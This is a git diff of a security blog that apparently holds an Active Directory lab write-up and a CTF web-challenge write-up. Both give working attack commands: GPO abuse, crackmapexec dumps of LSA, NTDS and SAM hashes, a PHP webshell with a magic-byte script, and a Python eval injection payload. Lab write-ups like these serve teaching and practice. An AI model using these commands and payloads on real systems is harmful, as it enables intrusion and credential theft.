&#39;north.sevenkingdoms.local&#39; +</span></span></code></pre></td></tr></table> +</div> +</div><p>Then&hellip;</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">pygpoabuse.py north.sevenkingdoms.local/samwell.tarly -gpo-id 848cf9d5-81b3-49d6-b628-d8fbcc1a322c +</span></span></code></pre></td></tr></table> +</div> +</div><p>This creates an admin user called &ldquo;john&rdquo; with the password &ldquo;H4x00r123..&rdquo;</p> +<p>We can now login via winrm</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 5986 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) +</span></span><span class="line"><span class="cl">HTTP 192.168.0.151 5986 WINTERFELL [*] https://192.168.0.151:5986/wsman +</span></span><span class="line"><span class="cl">WINRM 192.168.0.151 5986 WINTERFELL [+] north.sevenkingdoms.local\john:H4x00r123.. (Pwn3d!) +</span></span></code></pre></td></tr></table> +</div> +</div><hr> +<p>Using crackmap exec smb and the new user</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crackmapexec smb 192.168.0.151 -u john -p &#34;H4x00r123..&#34; --lsa +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">B 192.168.0.151 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumping LSA secrets +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:aes256-cts-hmac-sha1-96:9b9cfb7bc4b4696ac33184f5aef050c90c18bf5c5bbdc9dadbe0e538d401e205 +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:aes128-cts-hmac-sha1-96:939fc4f35f4894dca4328d7a1788b7ee +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:des-cbc-md5:1680497f851ad66d +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:plain_password_hex:81ba3b085654dc44a1ede7ea006e2330b869f885bb76d6ab9b9bf959a24835a4521407345d840c9e3708abbd8730822260734914769732e031d0fd7c3a3c71438b3da91460cde8ee884c8de619df6c8bf88c7040e1af0b552dd4aa01a9b1ba5cda63d6a11d54d7044f5a14bdd3263812850cb5184a3456c27ef083e7da3fd1143d814beeaa3adabc0a81e53eb0606dc151421cb756eed4c52a108f22f160d18e761642e1f66effc5fdb5ba3e01720c527d05cd1a24a7b8557579980b5757862c82168b0abbbc89aec55414e741e6252a03acd29acea1ae9b5fb933f2fb6ca9e838e0395cb84e19a10b3ffcd3e3409c92 +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:aad3b435b51404eeaad3b435b51404ee:9d473a58231037f6c63b9c7f0d50c61f::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\robb.stark:sexywolfy +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL dpapi_machinekey:0x2156559686eeb6fd6e9116a6dbb58d11e61c87b4 +</span></span><span class="line"><span class="cl">dpapi_userkey:0x802f741bb0b27e5f5fef3b7bc549bac02f4fa528 +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9 +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumped 8 LSA secrets to /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_120932.secrets and /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_120932.cached +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crackmapexec smb 192.168.0.151 -u john -p &#34;H4x00r123..&#34; --ntds +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull... +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3e1aa23cbaaed62c05427ff7148c04d8::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:2c643546d00054420505a2bf86d77c47::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:9d473a58231037f6c63b9c7f0d50c61f::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:1540ceefdcd5c9e64384ea6796bcd3b4::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL krbrelay$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:02f4f0cba0ec04eae62a64df80330594::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumped 20 NTDS hashes to /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_121039.ntds of which 16 were added to the database +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crackmapexec smb 192.168.0.151 -u john -p &#34;H4x00r123..&#34; --sam +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span><span class="lnt">6 +</span><span class="lnt">7 +</span><span class="lnt">8 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">TERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumping SAM hashes +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn&#39;t have hash information. +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Added 3 SAM hashes to the database +</span></span><span class="line"><span class="cl"> +</span></span></code></pre></td></tr></table> +</div> +</div><p>We also get another plaintext creds &lsquo;NORTH\robb.stark:sexywolfy&rsquo;</p> +<hr> +<p>Checking this use on Bloodhound we can see that there is a path to domain admin.</p> +<p><img src="https://f0rk3b0mb.github.io/images/goad_light/admin.jpeg" + + + + loading="lazy" + + alt="root" + + +></p> +<p>THe user has generic all , so we can add ourselves to domain admin group</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">net group &#34;Domain Admins&#34; john /add /domain +</span></span></code></pre></td></tr></table> +</div> +</div><p>From here we can login to the domain controller</p> +<p>And we pwn the north :)</p> +<hr> + + + BsidesNrb2024 https://f0rk3b0mb.github.io/p/bsidesnrb2024/ Sat, 26 Oct 2024 17:13:14 +0300 diff --git a/post/page/2/index.html b/post/page/2/index.html index 51326fc..adf470a 100644 --- a/post/page/2/index.html +++ b/post/page/2/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ + - - diff --git a/post/page/3/index.html b/post/page/3/index.html index c57b16d..d366571 100644 --- a/post/page/3/index.html +++ b/post/page/3/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ + - - diff --git a/post/page/4/index.html b/post/page/4/index.html index 118ded8..823a4c1 100644 --- a/post/page/4/index.html +++ b/post/page/4/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ + - - diff --git a/post/page/5/index.html b/post/page/5/index.html index 7cdcd2d..7f0af33 100644 --- a/post/page/5/index.html +++ b/post/page/5/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ + - -
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ +
diff --git a/search/index.json b/search/index.json index 8dc230f..37268d1 100644 --- a/search/index.json +++ b/search/index.json @@ -1 +1 @@ -[{"content":"Bsides Nairobi Cyberchallenge 2024 writeup This is a writeup for the web challenges in Bsides Nairobi Cyberchallenge held physically at Strathmore university, Nairobi\nMy team p3rf3ctr00t won , for the second year in a row. :)\nWeb category Mr donor Here we are given a wordpress site. With donation forms.\nSo first things first, i use wpscan to enumerate the site. There isint alot of content.\n1 2 3 4 use this to enumerate the users wpscan --url http://3.85.212.227/ -e u we get one user - admin_magharibi\nFrom the scan we can also see that there is a plugin called \u0026ldquo;give\u0026rdquo; version 3.41.0\nLooking on the internet we can see that it is vulnerable to CVE-2024-5932 so we can achieve code execution.\nI used this exploit \u0026raquo; here\nIn the shell we can see that there are 3 users\nbackup_svc ctfroom ubuntu checking the contents of wp-config.php\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 /** Database username */ define( \u0026#39;DB_USER\u0026#39;, \u0026#39;wordpressuser\u0026#39; ); /** Database password */ define( \u0026#39;DB_PASSWORD\u0026#39;, \u0026#39;roomctfpassword\u0026#39; ); /** Database hostname */ define( \u0026#39;DB_HOST\u0026#39;, \u0026#39;localhost\u0026#39; ); /** Database charset to use in creating database tables. */ define( \u0026#39;DB_CHARSET\u0026#39;, \u0026#39;utf8\u0026#39; ); /** The database collate type. Don\u0026#39;t change this if in doubt. */ define( \u0026#39;DB_COLLATE\u0026#39;, \u0026#39;\u0026#39; ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define(\u0026#39;AUTH_KEY\u0026#39;, \u0026#39;\u0026amp;p`1\u0026amp;)?\u0026gt;Qk=gl`- GRBr^tuc~=M?CSa^jx *?9Tk`+pj?fndQg{\u0026amp;|~SUtf8+K9FN\u0026#39;); define(\u0026#39;SECURE_AUTH_KEY\u0026#39;, \u0026#39;Okb-xgA4s`znPZ7?gxIdM$)kQFHcvskp\u0026amp; )K67 -YM_rftdk#:0.0B}}q?VaK\u0026lt;z\u0026lt;\u0026#39;); define(\u0026#39;LOGGED_IN_KEY\u0026#39;, \u0026#39;%3$eB%Ne%]s1= `I{5vOs2? EBbn@\u0026amp;{|\u0026gt;.sO?is~XzAN%\u0026lt;O*x-}*k+v}@Xg9RMrD\u0026#39;); define(\u0026#39;NONCE_KEY\u0026#39;, \u0026#39;$#JLk_v+0T6?i)[sJ(Q#f--bsbIO`KS(\u0026gt;}Foz55T|QU-;+L_7sqr{7oEj/m$_.yF\u0026#39;); define(\u0026#39;AUTH_SALT\u0026#39;, \u0026#39;EdGSntZ*0j\u0026gt;pc\u0026lt;^-l^1q`6o^Yf]s|\u0026amp;2BI t|1nwes:i\u0026lt;$jLx*1tJ1~5p)C(}|U-k\u0026#39;); define(\u0026#39;SECURE_AUTH_SALT\u0026#39;, \u0026#39;+O%(gn.H`zB)znBcp^TR#5EjM`(C\u0026gt;\u0026amp;wX|BGD#rJX?v#bU;OLEzdeoD`.c1_i`Svo\u0026#39;); define(\u0026#39;LOGGED_IN_SALT\u0026#39;, \u0026#39;G5x3@)Uw`++abxv sAMrkZtS*`87cfDX\u0026gt;bh-L|SIN!/bZV*^[wC+] nyLP\u0026lt;e6JY]\u0026#39;); define(\u0026#39;NONCE_SALT\u0026#39;, \u0026#39;MXp}(a| 7+TGK9-f2-a9*7@Xv}$6h-N\u0026lt;Z13a@_KlF+|Ugo-3\u0026lt;jHcX\u0026lt;WO[hy?XG ]\u0026#39;); We can login to the database and read the wordpress users and their passwords. I found the following hash for admin_magharibi: $P$BHFeuYRoSbViPBhP11FqGR0OQ.6N981.\nI started cracking it in the background while i looked around.\nChecking the crontab\u0026hellip;\n1 0 0 * * 0 sshpass -p \u0026#39;vnG^W6q%zjt^S\u0026#39; ssh -o StrictHostKeychecking=no -o UserKnownHostsFile=/dev/null backup_svc@127.0.0.1 \u0026#34;cp -R /var/www/wordpress /wp_backup\u0026#34; as you can see teh backup_svc user password is exposed.\nLogin via ssh as backup_svc, checking what the user can run as sudo\u0026hellip;\n1 2 3 4 sudo -l we see that the can run any command as sudo without sudo password We get bash shell ad read the flag\n372ae41683bd87573a4902d1ed2d58ad\nPixel Blunder This challenge gave a web interface with a file upload functionality. Seeing this it should click immediately that we are testing file upload vulnerabilities.\nThe site was checking if the image was valid through the magic bytes.\nSo we need to craft a php shell with png magic bytes.\n1 \u0026lt;?php system($_GET[\u0026#39;cmd\u0026#39;]);?\u0026gt; You can use a full php reverseshell as the payload , i use this since ive mastered it offhead.\nAdd magic bytes at it now identifies as a png, ill leave the python script below for future reference\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 import argparse import os def add_hex_to_file(file_path, hex_string, position): # Convert hex string to bytes hex_data = bytes.fromhex(hex_string) # Read the original file content with open(file_path, \u0026#39;rb\u0026#39;) as f: original_content = f.read() # Modify content based on the specified position if position == \u0026#34;start\u0026#34;: modified_content = hex_data + original_content elif position == \u0026#34;end\u0026#34;: modified_content = original_content + hex_data elif position.isdigit(): offset = int(position) modified_content = original_content[:offset] + hex_data + original_content[offset:] else: raise ValueError(\u0026#34;Invalid position. Use \u0026#39;start\u0026#39;, \u0026#39;end\u0026#39;, or an integer for custom offset.\u0026#34;) # Write the modified content back to the file with open(file_path, \u0026#39;wb\u0026#39;) as f: f.write(modified_content) print(f\u0026#34;Hex data added to {file_path} at position: {position}\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: parser = argparse.ArgumentParser(description=\u0026#34;Add hex data to a file at a specified position.\u0026#34;) parser.add_argument(\u0026#34;file\u0026#34;, help=\u0026#34;Path to the file to modify.\u0026#34;) parser.add_argument(\u0026#34;hex\u0026#34;, help=\u0026#34;Hex string to add.\u0026#34;) parser.add_argument(\u0026#34;position\u0026#34;, help=\u0026#34;Position to add hex data (\u0026#39;start\u0026#39;, \u0026#39;end\u0026#39;, or an integer for a custom offset).\u0026#34;) args = parser.parse_args() if not os.path.isfile(args.file): print(\u0026#34;File not found.\u0026#34;) else: add_hex_to_file(args.file, args.hex, args.position) Uploading the file we still get nothing.\nThere is still one more step\u0026hellip;.\nUploading the file the file-extension is stripped and if you know a php web server , it will not try to parse anyfile that doesnt have the proper php file extension.\nTHe trick for this is to use two extensions so that it strips one and leaves the other like \u0026ldquo;shell.php.php\u0026rdquo;\nWe get a shell and read the /flag.txt\nflag{7512a04d-5acd-45d9-b7ba-89467f2ba4ec}\nFaceoff In this challenge we are given a login page, username and password are admin:admin123 , my team mate got these from wherever.\nI solved this challenge ten minutes to time so i might not explain properly how i did this.\nAfter loggin in with the creds we are provided with a black page. Looking at the backend we can see that it uses flask . TIP: if you ever see flask in the backend most probably there is SSTI. So you have to look for user controlled input that is being diplayed in the page.\nThere was a hint for the chal , so i used the word \u0026ldquo;bsides\u0026rdquo; as a parameter\n1 2 http://3.88.113.117/do_something?bsides=\u0026lt;here goes your payload\u0026gt; Trying ssti payloads will give this error\n1 You have said: Error: unhashable type: \u0026#39;set I googled it and saw it was caused by python eval(). So we can get code execution by using the payload below\n1 http://3.88.113.117/do_something?bsides=__import__(\u0026#39;os\u0026#39;).system(\u0026#39;id\u0026#39;) Slap a reverse shell and you are good to go.\nThe flag wa hidden in \u0026ldquo;do_something/secret\u0026rdquo; , this i learnt after reading app.py file. Was lucky to get this 2 minutes before time\nflag: D0nt_4get_to_wear_Y0r_reflective_j4ck37s\n","date":"2024-10-26T17:13:14+03:00","image":"https://f0rk3b0mb.github.io/cover/perfect.png","permalink":"https://f0rk3b0mb.github.io/p/bsidesnrb2024/","title":"BsidesNrb2024"},{"content":"Windows Server High Availability Setup Part2\nCheck out part 1 \u0026raquo; here to be able to proceed to this stage\n1. Windows Server High Availability Setup of Roles Youll need to create a iscsi virtual hard disk through the domain controller and add it to the cluster , that step is in part 1\nMy disk is \u0026ldquo;cluster disk 1\u0026rdquo;\nFor this demonstration im going to make nginx web server application persistent across the nodes. So i copied nginx files to the cluster disk.\nThen create a role with the executable path and parameters start the nginx server\nGo to roles in failover cluster manager applucation and create an empty role. Then add resource in this case is a generic application. You can add services and native processes or even containers of you want those to be persistent.\nThen confirm, ensure the role is up with no errors.\nWith that we have configured nginx to be persistent across nodes. If you turn off node 1 it will be started in node 2 with all the data persistent across the nodes.\nFrom there you can setup the networking part of your appplication to ensure they can be accessed from other endpoints.\n","date":"2024-07-01T09:38:06+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows_server_high_availability_cluster_part2/","title":"Windows_server_high_availability_cluster_part2"},{"content":"Windows Server High Availability Setup\n1 2 A failover cluster is a group of independent computers that work together to increase the availability and scalability of clustered roles (formerly called clustered applications and services). The clustered servers (called nodes) are connected by physical cables and by software. If one or more of the cluster nodes fail, other nodes begin to provide service (a process known as failover). In addition, the clustered roles are proactively monitored to verify that they are working properly. If they are not working, they are restarted or moved to another node. Here we are going to setup iscsi disks and a cluster with 2 node servers.\nThe disk can be physical or virtual , for this tutorial im going to use a virtual harddisk.\nYou will also need:\nvmware workstation 3 windows server operation systems (im using 2022) 1. Install required components We will need the following components:\nFile Server Iscsi Target Server Failover Clustering Active Directory Domain Services 2 setup Domain Controller Create a domain server and add the other 2 vms to the domain\nfollow this tutorials here to do the same \u0026raquo;\nsetup DC\nadd computer to domain\n1 2 3 4 5 6 7 Before you begin you have to set the dns server that can resolve the dc domain name in the network settings. For this instance the dns is the same as the ip of the DC controller. This will enable the other device to access the domain pingpong.local without need of specifying the ip address. You will also need to set a static iP address for the domain controller server. 3. Create Iscsi disk 1 iSCSI is an IP-based standard for transferring data that supports host access by carrying SCSI commands over IP networks. 4. Iscsi initialization We now need to initialize the disk on both instances\nUse the ip address we set for the DC to discover the iscsi instance.\nThen connect.\nThen go to windows \u0026ldquo;create and formart disk partition\u0026rdquo; application to initialize the disk.\n5. Setup Cluster We are going to setup the cluster. Make sure you login with domain user account in the nodes. If you dont you will get an error when creating the cluster.\nIm creating the cluster in node 1\nChoose you current computer as the cluster server\nThen add the disk that we had created earlier as storage.\n6. Configure cluster quorum Learn more about this \u0026raquo; here\n7. Connect nodes to Cluster Use same steps as in stage 5 to add a node to the cluster\nYou can do this clicking add node in the cluster that we just created in 5\n8. Test cluster If you shutdown on vm the disk become online on the other and vice versa. The status also changes to down or up depending on which node is up.\nThis is a succesful demonstration of setup of hight availability in windows server. This can be applied to lots of services and real time application. The one demonstarted above is high availability for storage device.\n","date":"2024-06-21T14:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows_server_high_availability_cluster/","title":"Windows_server_high_availability_cluster"},{"content":"Writeup for urchinsec 2024 boot2root challenge This is the writeup for the boot 2 root challenge Bill Systems which i got the second solve.\nThis challneg requires knowledge in:\nrecon persistense lateral movement priviledge escalation Bill Systems categoty: boot2root difficulty: medium\nwe are given:\n1 2 3 SCOPE OF ENGAGEMENT domains : *.billsys.urc IP : 45.79.66.97 First we need to gather more info, so i ran an nmap scan to see open ports\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.7 (protocol 2.0) | ssh-hostkey: | 256 9e:cd:9e:38:58:35:4c:24:1a:01:29:0d:9d:26:fe:2b (ECDSA) |_ 256 50:35:25:83:7d:aa:d7:42:43:d4:bb:fa:e8:6c:12:bb (ED25519) 25/tcp filtered smtp 80/tcp open http |_http-title: Site doesn\u0026#39;t have a title (text/plain; charset=utf-8). | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:19 GMT | Content-Length: 0 | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:12 GMT | Content-Length: 0 | HTTPOptions: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:13 GMT |_ Content-Length: 0 443/tcp open https? 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 | Set-Cookie: i_like_gitea=7748aed9b1afa3fe; Path=/; 